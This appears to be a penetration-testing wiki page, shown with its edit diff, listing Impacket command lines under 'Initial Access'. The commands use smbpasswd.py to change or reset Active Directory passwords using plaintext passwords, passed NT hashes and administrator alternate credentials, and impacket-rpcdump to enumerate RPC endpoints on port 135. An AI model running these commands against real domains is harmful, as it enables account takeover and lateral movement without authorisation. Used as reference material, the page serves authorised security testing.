(Created page with "{{#lst:Active Directory|impacket}}") |
No edit summary |
||
Line 1: | Line 1: | ||
{{#lst:Active Directory|impacket}} | {{#lst:Active Directory|impacket}} | ||
[[Category:Initial Access]] |
Latest revision as of 07:37, 18 September 2023
Impacket
impacket-smbpasswd
#impacket-smbpasswd / Change password for vulnerable users.
smbpasswd.py j.doe@192.168.1.11
smbpasswd.py contoso.local/j.doe@DC1 -hashes :fc525c9683e8fe067095ba2ddc971889
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!'
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b58f2c319b81b3a49cb
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!' -altuser administrator -altpass 'Adm1nPassw0rd!'
smbpasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b58f2c319b81b3a49cb -altuser CONTOSO/administrator -altpass 'Adm1nPassw0rd!' -admin
smbpasswd.py SRV01/administrator:'Passw0rd!'@10.10.13.37 -newhashes :126502da14a98b58f2c319b81b3a49cb -altuser CONTOSO/SrvAdm -althash 6fe945ead39a7a6a2091001d98a913ab
impacket-rpcdump
# when port 135 or 539 is open.
135/tcp open msrpc Microsoft Windows RPC
impacket-rpcdump -p 135 10.10.206.21